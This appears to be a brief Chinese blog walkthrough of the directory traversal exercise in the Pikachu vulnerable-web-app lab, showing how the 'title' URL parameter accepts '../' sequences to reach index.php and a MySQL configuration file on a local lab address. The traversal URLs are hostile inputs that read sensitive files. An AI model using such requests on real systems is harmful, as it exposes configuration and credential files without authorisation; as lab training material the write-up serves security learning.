0
点赞
收藏
分享

微信扫一扫

目录遍历(pikachu)


第一步:访问目标网站

目录遍历(pikachu)_mysql


第二步:单击第一个链接和第二个链接查看内容

目录遍历(pikachu)_php_02


目录遍历(pikachu)_php_03


第三步:发现URL是通过title传参过去的,那么是否可以访问某些敏感文件

访问首页:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/index.php

目录遍历(pikachu)_mysql_04


访问敏感文件:http://192.168.106.130/pikachu/vul/dir/dir_list.php?title=…/…/…/…/…/mysql/my.ini

目录遍历(pikachu)_php_05


举报

相关推荐

0 条评论